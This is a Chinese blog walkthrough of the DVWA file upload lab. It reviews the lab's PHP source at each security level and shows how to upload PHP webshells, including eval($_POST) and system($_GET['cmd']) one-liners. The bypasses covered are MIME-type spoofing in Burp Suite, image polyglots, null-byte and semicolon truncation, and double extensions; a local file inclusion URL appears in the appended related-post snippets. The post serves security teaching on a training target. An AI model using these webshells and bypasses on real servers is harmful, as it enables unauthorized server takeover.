DVWA-文件上传

最新推荐文章于 2025-06-25 09:51:40 发布
最新推荐文章于 2025-06-25 09:51:40 发布
阅读量6.2k 收藏 18
点赞数 3
分类专栏: 安全
本文深入探讨文件上传漏洞的原理及利用方法,从低至高安全级别详细解析如何绕过限制,上传恶意文件至服务器,包括利用Apache解析漏洞、绕过WAF及上传木马等技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

概述

文件上传漏洞是指服务器对于用户上传的部分控制不严格导致攻击者可上传一个恶意的可执行文件至服务器,简单点就是用户直接或通过各种绕过方式将webshell上传至服务器进而执行利用

攻击原理:

1.web容器的解析漏洞
2.配合解析漏洞进行waf绕过和上传木马。
Apache的文件解析漏洞,比如现在我们有一个1.php.rar.xx.kk的文件,那么服务器会报错吗?答案是否定的,Apache有自己的一套文件处理方式,
它会从后往前进行文件解析,到遇见认识的后缀为止,最终会解析成1.php。那么,它都认识什么呢?这个在Apaceh的安装目录/conf/mime.types文件中有详细介绍。

文件上传漏洞的利用是有限制条件的,首先当然是要能够成功上传木马文件,其次上传文件必须能够被执行,最后就是上传文件的路径必须可知。

<?php @eval($_POST['pass']);?>

【基本原理】
利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST[‘pass’]表示从页面中获得pass这个参数值。

接下来进入DVWA平台:http://127.0.0.1:8088/DVWA/index.php ,准备开始实验。
在这里插入图片描述
安全级别下,查看后台源码:

 <?php
 if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
  }
?>

从源码中发现,low级别未对上传的文件进行任何验证。所以可以直接上传PHP
一句话木马。
(1)我们将准备好的一句话木马直接上传,然后就可以看到回显的路径:
在这里插入图片描述
在这里插入图片描述
可以用菜刀连接了,菜刀界面右键,然后点击添加。然后填写相关的数据,如下图:
在这里插入图片描述
“中国菜刀”页面操作说明:

1、是连接的URL,就是网站的主路径然后加上上传文件时回显的保存路径;
2、是菜刀连接时的密码,就是上面图片一句话提交的数据(本例为"pass");
3、是一句话的解析类型,可以是asp,php,aspx。不同的解析类型的一句话内容不一样,文件后缀名不一样。

(3)然后可以看连接成功的界面:
在这里插入图片描述
(4)接着双击或者右键“文件管理”,进入以下界面:
在这里插入图片描述
Medium 安全级别

<?php
  if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
 }
?>

从源码中可以看出,该安全级别下的系统,上传文件时,对文件进行了后缀名验证,在if语句中判断上传文件的类型是否为“image/jpeg”和大小是否小于100kb。
在这里插入图片描述
破解思路为先将一句话木马改名为符合要求的格式,然后使用Burp Suite 进行抓包,修改上传的文件类型。客户端的验证不能依靠!!!我们使用BurpSuite绕过了客户端前端的文件格式验证。所以为了预防文件上传漏洞,需要在服务器进行文件格式的验证。

在这里插入图片描述
接下来咱们开始上传Hack.PNG文件,并使用BurpSuite抓包并修改文件后缀:
在这里插入图片描述
在这里插入图片描述
可以发现,已经将非法文件Hack.php成功上传!!!

或者将其中的类型改掉,之后提交。
打开 burpsuite 抓包,我们会在请求正文中看到这样的东西:

------WebKitFormBoundaryh4zhLV52OKhf6aJg
Content-Disposition: form-data; name="uploaded"; filename="a.php"
Content-Type: application/octet-stream

<?php

phpinfo();
------WebKitFormBoundaryh4zhLV52OKhf6aJg--

右键"send to repeater",然后把那个application/octet-stream改成image/jpeg。点击"go"发送

High 安全等级
 <?php
 if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
 }
?>

可以看到,High级别的代码读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是“.jpg”、“.jpeg” 、“.png”之一。同时,getimagesize()函数更是限制了上传文件的文件头必须为图像类型。
我们需要将上传文件的文件头伪装成图片,首先利用copy命令将一句话木马文件Hack.php与正常的图片文件alone.jpg合并:
在这里插入图片描述

【备注】以下为CMD下用copy命令制作“图片木马”的步骤,其中,alone.jpg/b中“b”表示“二进制文件”,Hack.php/a中“a"表示ASCII码文件。

在这里插入图片描述
生成带有木马的图片文件hack.jpg:
在这里插入图片描述
接着我们打开生成的图片木马文件,我们可以看到一句话木马已附在图片文件末尾:
在这里插入图片描述
然后我们试着将生成的木马图片文件hack.jpg上传,上传成功!!!
在这里插入图片描述
法二、观察相同的位置,这回改成了使用后缀名判断。我们这个时候可以在后缀之前插入\0,即a.php\0.jpg,要注意它不是一个斜杠加上一个零,而是空字符。这样判断的时候,后缀是.jpg,写到磁盘的时候就会截断为a.php。既可以上传也可以执行
我们同样抓包并送到repeter。先把a.php改成a.php.jpg,然后切换到 hex 编辑模式来插入空字符。
在这里插入图片描述
鼠标拖动的范围就是a.php.jpg,在第二个2e格子上右键,点击"insert byte",会自动插入一个\0。之后点击"go"就大功告成了。

截断的核心,就是chr(0)这个字符 ,截断主要用于文件上传,不管什么样的截断其本质都是一样的,就是为了让程序忽略截断符后面的内容,只取截断符前面的内容。截断符有0x00,%00,’\0’。
在 IIS 和 Windows 环境下,截断字符 “;” 与 0x00 类似。可构造 aaa.asp;bbb.jpg。IIS 6 将执行aaa.asp。

法三、可以看到高等级代码对文件扩展名进行了过滤截取,并进行了扩展名的判断和大小的限制。但是这里做的判断依然不安全,通过修改上传的文件扩展名,我们可以轻松绕过限制。例如: 1.php 修改为 1.php.jpg 这样我们依然能上传PHP 格式的文件!

Impossible 安全级别
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

可以看到,Impossible级别的代码对上传文件 进行了重命名(为md5值,导致%00截断无法绕过过滤规则),加入Anti-CSRF token防护CSRF攻击,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本的文件。

参考博客:
https://blog.youkuaiyun.com/weixin_39190897/article/details/86771918
https://segmentfault.com/a/1190000006781093
https://blog.youkuaiyun.com/weixin_39190897/article/details/86772765

DVWA文件上传
qq_62078839的博客
04-03 3813
LOW 直接上传小马,上传成功 使用phpinfo();验证小马的可用性 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'na..
DVWA-文件上传漏洞代码审计(Medium、High)
oyqsb的博客
06-12 656
需要利用文件包含漏洞来执行php脚本,将上传的图片位置贴到文件包含漏洞利用处,访问后会返回一堆乱码即成功。若服务端脚本语言未对上传文件进行严格的过滤,会导致用户上传木马、病毒或恶意脚本,从而获得服务端的控制权限。:返回一个字符串在另一个字符串最后一次出现的位数(注意字符串是从0开始而不是1)将一张普通图片和php脚本copy出一个包含木马的图片。打开蚁剑添加url和密码。:通过指定长度来截取字符串,通过和上一个函数的配合截取出后缀名。:将上传文件移动到新位置,这里表示移动到指定目录
DVWA-File Upload(文件上传)
简简的博客
02-02 577
本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 ###Low: 函数介绍: basename()函数返回路径中的文件名部分。 string basename ( string $path [, string $suffix ] ) 参数介...
渗透入门必备-DVWA靶场搭建教程(极其详细)
最新发布
bdfcfff77fa的博客
06-25 951
将。
DVWA 之 File Upload(文件上传
RexHa的博客
10-02 2945
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA篇_文件上传
05-25 2367
记一次DVWA文件上传漏洞复现
DVWA--文件上传(初中高)
firecjh的博客
06-10 2867
page=file:///C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\2.png,并验证文件包含漏洞是否利用成功。用bp抓包,在将文件扩展名改成.php,因为后端没有验证,这样就可以成功上传扩展名为.php的木马。进入DVWA平台,选择DVWA Security,将安全级别设置为High。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。一句话木马的话,把木马写入了目标机,直接连接的时候就不用设置。
DVWA-master.zip
09-16
8. 文件上传漏洞:如果上传功能没有严格限制,攻击者可能上传恶意文件并执行,如PHP后门。 9. 功能滥用:某些功能可能被设计得过于强大,没有适当的权限控制,攻击者可以利用这些功能进行非法操作。 为了更好地...
DVWA-master 靶场环境
02-22
它模拟了一个典型的Web应用程序,其中包含了大量的常见安全漏洞,例如SQL注入、跨站脚本(XSS)、文件上传漏洞等。这些漏洞是故意设计的,目的是为了给学习者提供一个实际操作的机会,让他们在安全的环境下学习如何...
DVWA-master.rar
03-15
安装PHPStudy后,将DVWA-master目录中的所有文件上传至PHPStudy的Web根目录。 3. **数据库配置**: 在DVWA源代码中,找到`config.inc.php`文件,配置你的MySQL数据库连接信息,包括数据库名、用户名、密码和主机地址...
web渗透测试实战-DVWA-文件上传漏洞(High-高级),菜刀工具-蚁剑
qq_39174983的博客
12-30 7250
本文将描述小白本白在进行DVWA-文件上传漏洞(高级)实战时的完成步骤,以及所遇到的问题
DVWA(文件上传)
weixin_44023403的博客
12-06 490
DVWA文件上传文件上传(File Upload)LowMedium 文件上传(File Upload) 文件上传介绍: 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 文件上传漏洞的利用的条件: 1.能够成功上传木马文件; 2.上传文件必须能够被执行; 3.上传文件的路径必须可知. Low 源码: <?php if( isset( $_POST[ 'Upload'
DVWA文件上传(File Upload)
qq_39682037的博客
03-21 2726
文件上传(File Upload) Security Level: low 源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; ...
DVWA-文件上传(File Upload)
weixin_58954236的博客
08-20 1695
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA---文件上传
孤的博客
11-20 1005
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 网页能够上传文件的条件 表单提交方式:post (get方式提交有大小限制,post没有) 表单的enctype属性:必须设置为multipart/form-data 表单必须有文件上传项:fi...
DVWA——文件上传
m0_74426634的博客
04-07 1189
大部分的网站和应用系统都有上传功能,一些文件上传功能实现代码没有严格限制用户上传文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP文件,并能够将这些文件传递给PHP解释器,就可以在远程服务器上执行任意PHP脚本。当系统存在文件上传漏洞时攻击者可以将病毒、木马、WebShell、其他恶意脚本或者是包含了脚本的图片上传到服务器,这些文件将对攻击者后续攻击提供便利。根据具体漏洞的差异,此处上传的脚本可以是正常后缀的PHP、ASP以及JSP脚本,也可以是篡改后缀后的这几类脚本。
DVWA】——File Upload(文件上传
HinsCoder的博客
09-15 1433
文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。
DVWA -File Upload fi
03-24
<think>嗯,用户想了解DVWA中的文件上传功能的安全测试或漏洞利用方法。首先,我需要回忆一下DVWA的基本情况。DVWA是一个用于练习Web应用漏洞的靶场,文件上传漏洞是常见的漏洞类型之一。用户可能需要从基础的上传恶意文件开始,逐步深入。 首先,安全测试通常包括绕过客户端验证。DVWA可能有不同安全等级的设置,比如Low级别可能只在前端做检查,而High级别可能有更严格的后端验证。例如,在Low级别下,用户可以直接上传PHP文件,因为服务器可能没有验证文件类型或内容。这时候需要指导用户如何修改前端代码,比如删除JavaScript验证,或者使用Burp Suite拦截请求修改文件类型。 接下来是绕过MIME类型检查。服务器可能会检查Content-Type,比如image/jpeg。这时候需要将恶意文件的Content-Type改为允许的类型,这可能通过Burp Suite修改请求头来实现。 然后是绕过扩展名检查。有些服务器通过黑名单来阻止危险扩展名,但可能遗漏某些情况,比如.php5、.phtml等。用户可以尝试上传这些变种扩展名,或者利用双扩展名如test.php.jpg来绕过检查。 对于内容检查,服务器可能检测文件头,比如GIF文件的GIF89a标识。用户可以在恶意文件前添加这些标识,伪装成图片文件,同时保留PHP代码。这需要一定的混淆技巧。 在漏洞利用方面,上传Web Shell是常见方法,比如使用一句话木马<?php system($_GET['cmd']); ?>,然后通过浏览器访问该文件执行系统命令。结合其他漏洞如文件包含漏洞,可以进一步利用,比如通过路径遍历上传文件到非预期目录,或者利用本地文件包含执行上传的恶意文件。 防御措施方面,应该提到白名单验证、重命名文件、存储文件到非Web目录、使用安全扫描工具等方法。例如,引用中的nikto工具可以用来检测常见错误配置,而sqlmap用于SQL注入测试,但文件上传漏洞可能需要其他工具。 需要确保用户理解不同安全等级(Low、Medium、High)的差异,并针对不同等级给出具体方法。例如,High级别可能需要更复杂的绕过技巧,比如结合服务器解析漏洞。同时,提醒用户注意法律和道德规范,仅在授权环境下测试。 最后,生成的相关问题需要覆盖漏洞原理、工具使用、防御措施和结合其他漏洞的情况,确保全面性。需要检查引用中的资料是否相关,比如引用3提到的nikto可以用来检查配置错误,引用4的sqlmap可能与文件上传无关,但用户的问题可能涉及综合测试。</think>### DVWA文件上传漏洞安全测试与利用方法 --- #### 一、漏洞原理 DVWA文件上传功能存在未严格验证文件类型、内容及路径的风险,攻击者可上传Web Shell(如PHP恶意文件)实现远程代码执行[^1]。漏洞等级分为低、中、高三种安全模式,对应不同防御强度。 --- #### 二、安全测试步骤 1. **基础文件上传测试** - **低安全级别**:直接上传`.php`文件(如`shell.php`),验证服务器是否允许执行 ```php <?php system($_GET['cmd']); ?> ``` - **绕过客户端验证**:禁用JavaScript或修改前端代码删除文件类型检查[^5] 2. **绕过MIME类型检查** - 使用Burp Suite拦截请求,将`Content-Type: application/php`改为`image/jpeg`[^3] 3. **绕过扩展名黑名单** - 尝试`.php5`、`.phtml`或双扩展名如`shell.php.jpg` 4. **绕过内容检查** - 在PHP文件头部添加图片标识(如`GIF89a`),伪装成图片: ```php GIF89a <?php system($_GET['cmd']); ?> ``` --- #### 三、漏洞利用示例 1. **Web Shell执行命令** - 上传成功后访问`http://靶机地址/hackable/uploads/shell.php?cmd=whoami`,可返回当前系统用户[^4] 2. **结合文件包含漏洞** - 若存在LFI漏洞,通过路径遍历执行上传文件: ``` http://靶机地址/vulnerabilities/fi/?page=../../uploads/shell.php ``` --- #### 四、防御措施 1. 使用白名单验证文件扩展名和MIME类型 2. 重命名上传文件(如`md5(时间戳).jpg`) 3. 将文件存储在非Web可访问目录[^2] 4. 部署WAF或使用`nikto`扫描检测配置错误[^3] ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值